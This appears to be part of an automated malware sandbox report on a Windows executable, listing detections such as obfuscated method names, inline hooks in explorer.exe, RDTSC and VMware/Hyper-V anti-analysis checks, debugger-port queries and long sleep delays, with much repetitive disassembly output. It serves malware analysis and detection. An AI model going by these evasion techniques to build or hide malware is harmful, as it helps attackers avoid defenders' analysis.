                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, fk1UIvgrsuxnreKTRg.csHigh entropy of concatenated method names: 'P7QrEfGeY2', 'IZlrjQpof3', 'cMY5HNrcic', 'eOm5AaMxOj', 'x1MrSW1tPG', 'd0fr1GRNn3', 'NERrp3AfO1', 'KXvrvZtVS2', 'kMEr2ctAGL', 'EWLrIw8l0A'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, NEVdnhvnVgEaSNcLx9.csHigh entropy of concatenated method names: 'JmTPdCXLSy', 'tqaP1e5l3X', 'QshPvVZmQB', 'uLwP2EMXaB', 'Kx9PCkgYrt', 'MueP4jho6m', 'dQGPaS3ZQY', 'ERhPbB6V1G', 'QVZPKFxOmd', 'zlpP9ptdsr'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, SALVIvcA2ajS2o3C0N.csHigh entropy of concatenated method names: 'B6CV6JQ6GF', 'aG2VkdGsFc', 'ChFR4TDQJ8', 'SIqRaenU53', 'PG8RbU9rOm', 'Fw2RKxvIxr', 'H59R9G8cPp', 'KnHRhPkFlL', 'Ot7RuMCm6r', 'zJhRdXPRks'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Modifies the prolog of user mode functions (user mode inline hooks)
                Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7548, type: MEMORYSTR
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002939904 second address: 000000000293990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002939B7E second address: 0000000002939B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: 5D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: 6D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: 6E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: 7E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3326Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6623Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 2551Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 7421Jump to behavior
                Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13817
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeAPI coverage: 1.7 %
                Source: C:\Windows\SysWOW64\help.exeAPI coverage: 1.8 %
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe TID: 7572Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 8084Thread sleep count: 3326 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 8084Thread sleep time: -6652000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 8084Thread sleep count: 6623 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 8084Thread sleep time: -13246000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7796Thread sleep count: 2551 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7796Thread sleep time: -5102000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7796Thread sleep count: 7421 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 7796Thread sleep time: -14842000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000003.00000003.2284258372.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000003.00000003.2284258372.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA197 mov eax, dword ptr fs:[00000030h]2_2_019EA197
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA197 mov eax, dword ptr fs:[00000030h]2_2_019EA197
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA197 mov eax, dword ptr fs:[00000030h]2_2_019EA197
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAC188 mov eax, dword ptr fs:[00000030h]2_2_01AAC188
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAC188 mov eax, dword ptr fs:[00000030h]2_2_01AAC188
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A30185 mov eax, dword ptr fs:[00000030h]2_2_01A30185
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A94180 mov eax, dword ptr fs:[00000030h]2_2_01A94180
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A94180 mov eax, dword ptr fs:[00000030h]2_2_01A94180
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h]2_2_01A7019F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h]2_2_01A7019F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h]2_2_01A7019F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7019F mov eax, dword ptr fs:[00000030h]2_2_01A7019F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC61E5 mov eax, dword ptr fs:[00000030h]2_2_01AC61E5
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A201F8 mov eax, dword ptr fs:[00000030h]2_2_01A201F8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB61C3 mov eax, dword ptr fs:[00000030h]2_2_01AB61C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB61C3 mov eax, dword ptr fs:[00000030h]2_2_01AB61C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h]2_2_01A6E1D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h]2_2_01A6E1D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E1D0 mov ecx, dword ptr fs:[00000030h]2_2_01A6E1D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h]2_2_01A6E1D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E1D0 mov eax, dword ptr fs:[00000030h]2_2_01A6E1D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A20124 mov eax, dword ptr fs:[00000030h]2_2_01A20124
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov eax, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9E10E mov ecx, dword ptr fs:[00000030h]2_2_01A9E10E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9A118 mov ecx, dword ptr fs:[00000030h]2_2_01A9A118
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9A118 mov eax, dword ptr fs:[00000030h]2_2_01A9A118
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9A118 mov eax, dword ptr fs:[00000030h]2_2_01A9A118
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9A118 mov eax, dword ptr fs:[00000030h]2_2_01A9A118
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB0115 mov eax, dword ptr fs:[00000030h]2_2_01AB0115
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC156 mov eax, dword ptr fs:[00000030h]2_2_019EC156
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6154 mov eax, dword ptr fs:[00000030h]2_2_019F6154
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6154 mov eax, dword ptr fs:[00000030h]2_2_019F6154
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h]2_2_01A84144
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h]2_2_01A84144
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A84144 mov ecx, dword ptr fs:[00000030h]2_2_01A84144
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h]2_2_01A84144
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A84144 mov eax, dword ptr fs:[00000030h]2_2_01A84144
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A88158 mov eax, dword ptr fs:[00000030h]2_2_01A88158
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A880A8 mov eax, dword ptr fs:[00000030h]2_2_01A880A8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB60B8 mov eax, dword ptr fs:[00000030h]2_2_01AB60B8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB60B8 mov ecx, dword ptr fs:[00000030h]2_2_01AB60B8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F208A mov eax, dword ptr fs:[00000030h]2_2_019F208A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A760E0 mov eax, dword ptr fs:[00000030h]2_2_01A760E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A320F0 mov ecx, dword ptr fs:[00000030h]2_2_01A320F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC0F0 mov eax, dword ptr fs:[00000030h]2_2_019EC0F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F80E9 mov eax, dword ptr fs:[00000030h]2_2_019F80E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A720DE mov eax, dword ptr fs:[00000030h]2_2_01A720DE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_019EA0E3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86030 mov eax, dword ptr fs:[00000030h]2_2_01A86030
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A74000 mov ecx, dword ptr fs:[00000030h]2_2_01A74000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A92000 mov eax, dword ptr fs:[00000030h]2_2_01A92000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E016 mov eax, dword ptr fs:[00000030h]2_2_01A0E016
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA020 mov eax, dword ptr fs:[00000030h]2_2_019EA020
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC020 mov eax, dword ptr fs:[00000030h]2_2_019EC020
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2050 mov eax, dword ptr fs:[00000030h]2_2_019F2050
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1C073 mov eax, dword ptr fs:[00000030h]2_2_01A1C073
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76050 mov eax, dword ptr fs:[00000030h]2_2_01A76050
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8397 mov eax, dword ptr fs:[00000030h]2_2_019E8397
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8397 mov eax, dword ptr fs:[00000030h]2_2_019E8397
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8397 mov eax, dword ptr fs:[00000030h]2_2_019E8397
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE388 mov eax, dword ptr fs:[00000030h]2_2_019EE388
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE388 mov eax, dword ptr fs:[00000030h]2_2_019EE388
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE388 mov eax, dword ptr fs:[00000030h]2_2_019EE388
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1438F mov eax, dword ptr fs:[00000030h]2_2_01A1438F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1438F mov eax, dword ptr fs:[00000030h]2_2_01A1438F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A003E9 mov eax, dword ptr fs:[00000030h]2_2_01A003E9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F0 mov eax, dword ptr fs:[00000030h]2_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F0 mov eax, dword ptr fs:[00000030h]2_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E3F0 mov eax, dword ptr fs:[00000030h]2_2_01A0E3F0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A263FF mov eax, dword ptr fs:[00000030h]2_2_01A263FF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F83C0 mov eax, dword ptr fs:[00000030h]2_2_019F83C0
